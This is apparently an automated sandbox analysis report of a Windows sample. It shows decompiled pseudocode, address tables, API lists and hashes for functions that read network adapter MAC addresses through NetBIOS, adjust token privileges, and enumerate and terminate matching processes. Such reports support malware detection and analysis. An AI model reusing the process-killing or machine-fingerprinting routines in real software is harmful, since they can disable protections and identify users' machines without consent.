				char* _t115;
				void* _t116;
				intOrPtr _t145;
				void* _t152;
				intOrPtr _t155;
				intOrPtr _t156;
				void* _t162;

				_t155 = _t156;
				_t116 = 5;
				do {
					_push(0);
					_push(0);
					_t116 = _t116 - 1;
				} while (_t116 != 0);
				_v8 = __eax;
				_push(_t155);
				_push(0x475868);
				_push( *[fs:eax]);
				 *[fs:eax] = _t156;
				E004049C0(_v8);
				E004049C0( &_v20);
				_t115 = E0040275C(0x40);
				E004032B4(_t115, 0x40);
				_v16 = E0040275C(0x100);
				E004032B4(_v16, 0x100);
				_t152 = E0040275C(0x3c);
				E004032B4(_t152, 0x3c);
				 *_v16 = 0;
				 *_t115 = 0x37;
				 *((intOrPtr*)(_t115 + 4)) = _v16;
				 *((short*)(_t115 + 8)) = 4;
				_push(_t115);
				L00472C18();
				_v12 = 0;
				while(1) {
					E004032B4(_t115, 0x40);
					 *_t115 = 0x32;
					 *((char*)(_t115 + 0x30)) = _v16[_v12 + 1];
					_push(_t115);
					L00472C18();
					E004032B4(_t115, 0x40);
					 *_t115 = 0x33;
					_t79 = _v16[_v12 + 1];
					 *((char*)(_t115 + 0x30)) = _t79;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t152 = _t152;
					 *((intOrPtr*)(_t115 + 4)) = 0x475878;
					 *((short*)(_t115 + 8)) = 0x3c;
					_push(_t115);
					L00472C18();
					if(_t79 == 0 || _t79 == 6) {
						E00409600( &_v24, 2);
						_push(_v24);
						_push(0x475890);
						E00409600( &_v28, 2);
						_push(_v28);
						_push(0x475890);
						E00409600( &_v32, 2);
						_push(_v32);
						_push(0x475890);
						E00409600( &_v36, 2);
						_push(_v36);
						_push(0x475890);
						E00409600( &_v40, 2);
						_push(_v40);
						_push(0x475890);
						E00409600( &_v44, 2);
						_push(_v44);
						E00404D40();
					}
					_v12 = _v12 + 1;
					_t162 = ( *_v16 & 0x000000ff) - _v12;
					if(_t162 <= 0) {
						break;
					}
					E00404DCC(_v20, "00-00-00-00-00-00");
					if(_t162 == 0) {
						continue;
					}
					break;
				}
				E0040277C(_t115);
				E0040277C(_t152);
				E0040277C(_v16);
				E00404A14(_v8, _v20);
				_pop(_t145);
				 *[fs:eax] = _t145;
				_push(0x47586f);
				return E004049E4( &_v44, 7);
			}





















                                                                                                                                                                                                                            0x00475659
                                                                                                                                                                                                                            0x0047565b
                                                                                                                                                                                                                            0x00475660
                                                                                                                                                                                                                            0x00475660
                                                                                                                                                                                                                            0x00475662
                                                                                                                                                                                                                            0x00475664
                                                                                                                                                                                                                            0x00475664
                                                                                                                                                                                                                            0x0047566a
                                                                                                                                                                                                                            0x0047566f
                                                                                                                                                                                                                            0x00475670
                                                                                                                                                                                                                            0x00475675
                                                                                                                                                                                                                            0x00475678
                                                                                                                                                                                                                            0x0047567e
                                                                                                                                                                                                                            0x00475686
                                                                                                                                                                                                                            0x00475695
                                                                                                                                                                                                                            0x004756a0
                                                                                                                                                                                                                            0x004756af
                                                                                                                                                                                                                            0x004756bc
                                                                                                                                                                                                                            0x004756cb
                                                                                                                                                                                                                            0x004756d6
                                                                                                                                                                                                                            0x004756de
                                                                                                                                                                                                                            0x004756e1
                                                                                                                                                                                                                            0x004756e7
                                                                                                                                                                                                                            0x004756ea
                                                                                                                                                                                                                            0x004756f0
                                                                                                                                                                                                                            0x004756f1
                                                                                                                                                                                                                            0x004756f8
                                                                                                                                                                                                                            0x004756fb
                                                                                                                                                                                                                            0x00475706
                                                                                                                                                                                                                            0x0047570b
                                                                                                                                                                                                                            0x00475718
                                                                                                                                                                                                                            0x0047571b
                                                                                                                                                                                                                            0x0047571c
                                                                                                                                                                                                                            0x0047572a
                                                                                                                                                                                                                            0x0047572f
                                                                                                                                                                                                                            0x00475738
                                                                                                                                                                                                                            0x0047573c
                                                                                                                                                                                                                            0x00475748
                                                                                                                                                                                                                            0x00475749
                                                                                                                                                                                                                            0x0047574a
                                                                                                                                                                                                                            0x0047574b
                                                                                                                                                                                                                            0x0047574c
                                                                                                                                                                                                                            0x0047574d
                                                                                                                                                                                                                            0x00475750
                                                                                                                                                                                                                            0x00475756
                                                                                                                                                                                                                            0x00475757
                                                                                                                                                                                                                            0x0047575e
                                                                                                                                                                                                                            0x00475774
                                                                                                                                                                                                                            0x00475779
                                                                                                                                                                                                                            0x0047577c
                                                                                                                                                                                                                            0x0047578e
                                                                                                                                                                                                                            0x00475793
                                                                                                                                                                                                                            0x00475796
                                                                                                                                                                                                                            0x004757a8
                                                                                                                                                                                                                            0x004757ad
                                                                                                                                                                                                                            0x004757b0
                                                                                                                                                                                                                            0x004757c2
                                                                                                                                                                                                                            0x004757c7
                                                                                                                                                                                                                            0x004757ca
                                                                                                                                                                                                                            0x004757dc
                                                                                                                                                                                                                            0x004757e1
                                                                                                                                                                                                                            0x004757e4
                                                                                                                                                                                                                            0x004757f6
                                                                                                                                                                                                                            0x004757fb
                                                                                                                                                                                                                            0x00475806
                                                                                                                                                                                                                            0x00475806
                                                                                                                                                                                                                            0x0047580b
                                                                                                                                                                                                                            0x00475814
                                                                                                                                                                                                                            0x00475817
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00475821
                                                                                                                                                                                                                            0x00475826
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00475826
                                                                                                                                                                                                                            0x0047582e
                                                                                                                                                                                                                            0x00475835
                                                                                                                                                                                                                            0x0047583d
                                                                                                                                                                                                                            0x00475848
                                                                                                                                                                                                                            0x0047584f
                                                                                                                                                                                                                            0x00475852
                                                                                                                                                                                                                            0x00475855
                                                                                                                                                                                                                            0x00475867

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • Netbios.NETAPI32(00000000), ref: 004756F1
                                                                                                                                                                                                                            • Netbios.NETAPI32(00000000), ref: 0047571C
                                                                                                                                                                                                                            • Netbios.NETAPI32(00000000), ref: 00475757
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Netbios
                                                                                                                                                                                                                            • String ID: 00-00-00-00-00-00$<
                                                                                                                                                                                                                            • API String ID: 544444789-41023692
                                                                                                                                                                                                                            • Opcode ID: 1b3c46c424ce61c2de374a88a3e63ba3c340aecb30e3da8f6094dd15b6fa7177
                                                                                                                                                                                                                            • Instruction ID: dc29ca18e00d15a9725c9b3c649b13ae9c6c43c4cf661d243729a07c7496b8e6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b3c46c424ce61c2de374a88a3e63ba3c340aecb30e3da8f6094dd15b6fa7177
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A5183346045449BDB01EFA9C882BDEBBF5AF4C304F5584BEE458BB383C6789901CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042AE8C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                            			E0042AE8C(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				struct HPALETTE__* _v12;
				char _v13;
				intOrPtr _v25;
				intOrPtr _v29;
				intOrPtr _v33;
				intOrPtr _v57;
				short _v59;
				short _v61;
				intOrPtr _v65;
				intOrPtr _v69;
				intOrPtr _v73;
				intOrPtr _v77;
				intOrPtr _v89;
				intOrPtr _v93;
				void _v97;
				void* _t44;
				void* _t46;
				intOrPtr _t49;
				void* _t54;
				struct HPALETTE__* _t56;
				void* _t70;
				void* _t72;
				void* _t73;
				struct HDC__* _t74;
				intOrPtr _t95;
				void* _t105;
				void* _t107;
				void* _t108;
				intOrPtr _t110;

				_t105 = _t107;
				_t108 = _t107 + 0xffffffa0;
				_t70 = __edx;
				_v8 = __eax;
				_t44 = E00429FC8(_v8);
				if(_t70 == _t44) {
					L16:
					return _t44;
				} else {
					_t46 = _t70 - 1;
					if(_t46 < 0) {
						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
						goto L16;
					} else {
						if(_t46 == 7) {
							_t49 =  *0x49d90c; // 0x422ec0
							_t44 = E00425F28(_t49);
							goto L16;
						} else {
							E004032B4( &_v97, 0x54);
							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
							_t110 = _t108 + 0xc;
							_v13 = 0;
							_v77 = 0;
							_v73 = 0x28;
							_v69 = _v93;
							_v65 = _v89;
							_v61 = 1;
							_v59 =  *0x0049B8B3 & 0x000000ff;
							_t55 =  *((intOrPtr*)(_t54 + 0x10));
							_v12 =  *((intOrPtr*)(_t54 + 0x10));
							_t72 = _t70 - 2;
							if(_t72 == 0) {
								_t56 =  *0x49e894; // 0x5e080725
								_v12 = _t56;
							} else {
								_t73 = _t72 - 1;
								if(_t73 == 0) {
									_push(0);
									L00407638();
									_t74 = E00426060(_t55);
									_v12 = CreateHalftonePalette(_t74);
									_v13 = 1;
									_push(_t74);
									_push(0);
									L00407888();
								} else {
									if(_t73 == 2) {
										_v57 = 3;
										_v33 = 0xf800;
										_v29 = 0x7e0;
										_v25 = 0x1f;
									}
								}
							}
							 *[fs:eax] = _t110;
							 *((char*)(_v8 + 0x22)) = E00429AA8( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x42afd9, _t105),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
							_pop(_t95);
							 *[fs:eax] = _t95;
							_push(0x42afe0);
							if(_v13 != 0) {
								return DeleteObject(_v12);
							}
							return 0;
						}
					}
				}
			}

































                                                                                                                                                                                                                            0x0042ae8d
                                                                                                                                                                                                                            0x0042ae8f
                                                                                                                                                                                                                            0x0042ae95
                                                                                                                                                                                                                            0x0042ae97
                                                                                                                                                                                                                            0x0042ae9d
                                                                                                                                                                                                                            0x0042aea4
                                                                                                                                                                                                                            0x0042afeb
                                                                                                                                                                                                                            0x0042aff1
                                                                                                                                                                                                                            0x0042aeaa
                                                                                                                                                                                                                            0x0042aeac
                                                                                                                                                                                                                            0x0042aeae
                                                                                                                                                                                                                            0x0042aebd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042aeb0
                                                                                                                                                                                                                            0x0042aeb2
                                                                                                                                                                                                                            0x0042aec5
                                                                                                                                                                                                                            0x0042aeca
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042aeb4
                                                                                                                                                                                                                            0x0042aede
                                                                                                                                                                                                                            0x0042aef4
                                                                                                                                                                                                                            0x0042aef4
                                                                                                                                                                                                                            0x0042aef6
                                                                                                                                                                                                                            0x0042aefc
                                                                                                                                                                                                                            0x0042aeff
                                                                                                                                                                                                                            0x0042af09
                                                                                                                                                                                                                            0x0042af0f
                                                                                                                                                                                                                            0x0042af12
                                                                                                                                                                                                                            0x0042af23
                                                                                                                                                                                                                            0x0042af27
                                                                                                                                                                                                                            0x0042af2a
                                                                                                                                                                                                                            0x0042af2d
                                                                                                                                                                                                                            0x0042af30
                                                                                                                                                                                                                            0x0042af3d
                                                                                                                                                                                                                            0x0042af42
                                                                                                                                                                                                                            0x0042af32
                                                                                                                                                                                                                            0x0042af32
                                                                                                                                                                                                                            0x0042af34
                                                                                                                                                                                                                            0x0042af47
                                                                                                                                                                                                                            0x0042af49
                                                                                                                                                                                                                            0x0042af53
                                                                                                                                                                                                                            0x0042af5b
                                                                                                                                                                                                                            0x0042af5e
                                                                                                                                                                                                                            0x0042af62
                                                                                                                                                                                                                            0x0042af63
                                                                                                                                                                                                                            0x0042af65
                                                                                                                                                                                                                            0x0042af36
                                                                                                                                                                                                                            0x0042af39
                                                                                                                                                                                                                            0x0042af6c
                                                                                                                                                                                                                            0x0042af73
                                                                                                                                                                                                                            0x0042af7a
                                                                                                                                                                                                                            0x0042af81
                                                                                                                                                                                                                            0x0042af81
                                                                                                                                                                                                                            0x0042af39
                                                                                                                                                                                                                            0x0042af34
                                                                                                                                                                                                                            0x0042af93
                                                                                                                                                                                                                            0x0042afb9
                                                                                                                                                                                                                            0x0042afbe
                                                                                                                                                                                                                            0x0042afc1
                                                                                                                                                                                                                            0x0042afc4
                                                                                                                                                                                                                            0x0042afcd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042afd3
                                                                                                                                                                                                                            0x0042afd8
                                                                                                                                                                                                                            0x0042afd8
                                                                                                                                                                                                                            0x0042aeb2
                                                                                                                                                                                                                            0x0042aeae

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 0042AF49
                                                                                                                                                                                                                            • CreateHalftonePalette.GDI32(00000000,00000000), ref: 0042AF56
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,00000000), ref: 0042AF65
                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0042AFD3
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380CreateDeleteHalftoneObjectPalette
                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                            • API String ID: 733450718-3887548279
                                                                                                                                                                                                                            • Opcode ID: 7301114233ef7d42fd27edf1c10dece0a1fbbcbc6a5acff47dc734edbe3872c0
                                                                                                                                                                                                                            • Instruction ID: 2a0d3ada1f03d7f2548bc3f3360be5a611323719477d61fc332258d066da6c8f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7301114233ef7d42fd27edf1c10dece0a1fbbcbc6a5acff47dc734edbe3872c0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE41F470B04208DFDB00DFA8D585B9EB7F6EF49304F9140AAE804A7391C67C5E15DB8A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00475A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E00475A94(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v268;
				long _v296;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				void* _t50;
				void* _t53;
				void* _t60;
				intOrPtr _t67;
				void* _t78;
				void* _t81;
				void* _t84;

				_push(__ebx);
				_push(__esi);
				_v308 = 0;
				_v316 = 0;
				_v320 = 0;
				_v312 = 0;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t81);
				_push(0x475bd5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t81 + 0xfffffec4;
				E00475958("SeSystemProfilePrivilege", __ebx, 1, __edi, __esi);
				_t60 = E00472B20(2, 0);
				_t84 = _t60 - 0xffffffff;
				if(_t84 != 0) {
					_v304 = 0x128;
					E00472B40(_t60,  &_v304);
					do {
						E00404C30( &_v312, 0x104,  &_v268);
						E00408DE4(_v312, 0x104,  &_v308);
						_push(_v308);
						E00404BB8( &_v320, E00404E80(_v8));
						E00408DE4(_v320, 0x104,  &_v316);
						_pop(_t50);
						E00404DCC(_t50, _v316);
						if(_t84 == 0) {
							_t78 = OpenProcess(1, 0, _v296);
							TerminateProcess(_t78, 0);
							CloseHandle(_t78);
						}
						_t53 = E00472B60(_t60,  &_v304);
						asm("sbb eax, eax");
					} while (_t53 + 1 != 0);
				}
				CloseHandle(_t60);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x475bdc);
				E004049E4( &_v320, 4);
				return E004049C0( &_v8);
			}


















                                                                                                                                                                                                                            0x00475a9d
                                                                                                                                                                                                                            0x00475a9e
                                                                                                                                                                                                                            0x00475aa1
                                                                                                                                                                                                                            0x00475aa7
                                                                                                                                                                                                                            0x00475aad
                                                                                                                                                                                                                            0x00475ab3
                                                                                                                                                                                                                            0x00475ab9
                                                                                                                                                                                                                            0x00475abf
                                                                                                                                                                                                                            0x00475ac6
                                                                                                                                                                                                                            0x00475ac7
                                                                                                                                                                                                                            0x00475acc
                                                                                                                                                                                                                            0x00475acf
                                                                                                                                                                                                                            0x00475ad9
                                                                                                                                                                                                                            0x00475aea
                                                                                                                                                                                                                            0x00475aec
                                                                                                                                                                                                                            0x00475aef
                                                                                                                                                                                                                            0x00475af5
                                                                                                                                                                                                                            0x00475b07
                                                                                                                                                                                                                            0x00475b0c
                                                                                                                                                                                                                            0x00475b1d
                                                                                                                                                                                                                            0x00475b2e
                                                                                                                                                                                                                            0x00475b39
                                                                                                                                                                                                                            0x00475b4a
                                                                                                                                                                                                                            0x00475b5b
                                                                                                                                                                                                                            0x00475b66
                                                                                                                                                                                                                            0x00475b67
                                                                                                                                                                                                                            0x00475b6c
                                                                                                                                                                                                                            0x00475b7e
                                                                                                                                                                                                                            0x00475b83
                                                                                                                                                                                                                            0x00475b89
                                                                                                                                                                                                                            0x00475b89
                                                                                                                                                                                                                            0x00475b96
                                                                                                                                                                                                                            0x00475b9e
                                                                                                                                                                                                                            0x00475ba1
                                                                                                                                                                                                                            0x00475b0c
                                                                                                                                                                                                                            0x00475baa
                                                                                                                                                                                                                            0x00475bb1
                                                                                                                                                                                                                            0x00475bb4
                                                                                                                                                                                                                            0x00475bb7
                                                                                                                                                                                                                            0x00475bc7
                                                                                                                                                                                                                            0x00475bd4

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00475958: GetCurrentProcess.KERNEL32(00000028,?,00000000,00475A82), ref: 00475998
                                                                                                                                                                                                                              • Part of subcall function 00475958: OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,00475A82), ref: 0047599E
                                                                                                                                                                                                                              • Part of subcall function 00475958: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 004759C8
                                                                                                                                                                                                                              • Part of subcall function 00475958: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,?,?,00000000,00475A2E,?,00000000,00000028,?,00000000,00475A82), ref: 00475A12
                                                                                                                                                                                                                              • Part of subcall function 00475958: CloseHandle.KERNEL32(?,00475A35,00000000,00000028,?,00000000,00475A82), ref: 00475A28
                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00475B79
                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,?), ref: 00475B83
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,?), ref: 00475B89
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00475BD5), ref: 00475BAA
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • SeSystemProfilePrivilege, xrefs: 00475AD4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process$CloseHandle$OpenToken$AdjustCurrentLookupPrivilegePrivilegesTerminateValue
                                                                                                                                                                                                                            • String ID: SeSystemProfilePrivilege
                                                                                                                                                                                                                            • API String ID: 529513329-1276405716
                                                                                                                                                                                                                            • Opcode ID: 75f4e8ad18347cc1a87371820c2482e5846d8527a850ee217239de5900a55147
                                                                                                                                                                                                                            • Instruction ID: 580ab526c7a6c82e50ebcca5458142647b940d84bf333f31e065c70003e8480a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75f4e8ad18347cc1a87371820c2482e5846d8527a850ee217239de5900a55147
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D93132709006189BDB20EB66CD82BDDB3B5AF85314F1085FAF50CB6291DA786F45CF98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00422C88 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E00422C88(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x49e668; // 0x400000
				 *0x49b5dc = _t6;
				_t8 =  *0x49b5f0; // 0x422c78
				_t9 =  *0x49e668; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00407540 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x49e668; // 0x400000
						_t20 =  *0x49b5f0; // 0x422c78
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x49b5cc);
				}
				_t13 =  *0x49e668; // 0x400000
				_t24 =  *0x49b5f0; // 0x422c78
				_t22 = E00407A8C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E00422BCC(_a4, _a8));
				}
				return _t22;
			}














                                                                                                                                                                                                                            0x00422c8f
                                                                                                                                                                                                                            0x00422c94
                                                                                                                                                                                                                            0x00422c9d
                                                                                                                                                                                                                            0x00422ca3
                                                                                                                                                                                                                            0x00422ca9
                                                                                                                                                                                                                            0x00422cb1
                                                                                                                                                                                                                            0x00422cb3
                                                                                                                                                                                                                            0x00422cb6
                                                                                                                                                                                                                            0x00422cc4
                                                                                                                                                                                                                            0x00422cc6
                                                                                                                                                                                                                            0x00422ccc
                                                                                                                                                                                                                            0x00422cd2
                                                                                                                                                                                                                            0x00422cd2
                                                                                                                                                                                                                            0x00422cdc
                                                                                                                                                                                                                            0x00422cdc
                                                                                                                                                                                                                            0x00422cf2
                                                                                                                                                                                                                            0x00422cff
                                                                                                                                                                                                                            0x00422d0f
                                                                                                                                                                                                                            0x00422d16
                                                                                                                                                                                                                            0x00422d27
                                                                                                                                                                                                                            0x00422d27
                                                                                                                                                                                                                            0x00422d32

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                                                                                                            • String ID: x,B
                                                                                                                                                                                                                            • API String ID: 4025006896-71347176
                                                                                                                                                                                                                            • Opcode ID: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                                                                                                                                                                                            • Instruction ID: 5edbcaf682720338496e3359f8b598ec737c219f81609156ea6670bddb9c1a51
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0018E71744204BBDB00EB6AED81F9A7399EB28718F544137F904E73A1D679AC40CBAD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042572C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E0042572C(void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				intOrPtr _t19;
				char _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t38;
				void* _t39;
				void* _t40;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t50;
				void* _t51;

				_t40 = __edx;
				_t39 = __ecx;
				if(__edx != 0) {
					_t51 = _t51 + 0xfffffff0;
					_t19 = E00403F10(_t19, _t50);
				}
				_t38 = _t40;
				_t46 = _t19;
				E00403BBC(0);
				_t1 = _t46 + 0x38; // 0x38
				L00407198();
				_t47 = E00424C3C(1);
				 *((intOrPtr*)(_t46 + 0xc)) = _t47;
				 *((intOrPtr*)(_t47 + 0xc)) = _t46;
				 *((intOrPtr*)(_t47 + 8)) = 0x425eb0;
				_t5 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t47 + 0x14)) = _t5;
				_t48 = E00425168(1);
				 *((intOrPtr*)(_t46 + 0x10)) = _t48;
				 *((intOrPtr*)(_t48 + 0xc)) = _t46;
				 *((intOrPtr*)(_t48 + 8)) = 0x425ed0;
				_t10 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t48 + 0x14)) = _t10;
				_t49 = E00425434(1);
				 *((intOrPtr*)(_t46 + 0x14)) = _t49;
				 *((intOrPtr*)(_t49 + 0xc)) = _t46;
				 *((intOrPtr*)(_t49 + 8)) = 0x425ef0;
				_t15 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t49 + 0x14)) = _t15;
				 *((intOrPtr*)(_t46 + 0x20)) = 0xcc0020;
				_t32 =  *0x4257ec; // 0x0
				 *((char*)(_t46 + 8)) = _t32;
				_t33 =  *0x49e8ec; // 0x2210b08
				E0041AFE4(_t33, _t38, _t39, _t46, _t49);
				_t35 = _t46;
				if(_t38 != 0) {
					E00403F68(_t35);
					_pop( *[fs:0x0]);
				}
				return _t46;
			}


















                                                                                                                                                                                                                            0x0042572c
                                                                                                                                                                                                                            0x0042572c
                                                                                                                                                                                                                            0x00425731
                                                                                                                                                                                                                            0x00425733
                                                                                                                                                                                                                            0x00425736
                                                                                                                                                                                                                            0x00425736
                                                                                                                                                                                                                            0x0042573b
                                                                                                                                                                                                                            0x0042573d
                                                                                                                                                                                                                            0x00425743
                                                                                                                                                                                                                            0x00425748
                                                                                                                                                                                                                            0x0042574c
                                                                                                                                                                                                                            0x0042575d
                                                                                                                                                                                                                            0x0042575f
                                                                                                                                                                                                                            0x00425762
                                                                                                                                                                                                                            0x00425765
                                                                                                                                                                                                                            0x0042576c
                                                                                                                                                                                                                            0x0042576f
                                                                                                                                                                                                                            0x0042577e
                                                                                                                                                                                                                            0x00425780
                                                                                                                                                                                                                            0x00425783
                                                                                                                                                                                                                            0x00425786
                                                                                                                                                                                                                            0x0042578d
                                                                                                                                                                                                                            0x00425790
                                                                                                                                                                                                                            0x0042579f
                                                                                                                                                                                                                            0x004257a1
                                                                                                                                                                                                                            0x004257a4
                                                                                                                                                                                                                            0x004257a7
                                                                                                                                                                                                                            0x004257ae
                                                                                                                                                                                                                            0x004257b1
                                                                                                                                                                                                                            0x004257b4
                                                                                                                                                                                                                            0x004257bb
                                                                                                                                                                                                                            0x004257c0
                                                                                                                                                                                                                            0x004257c5
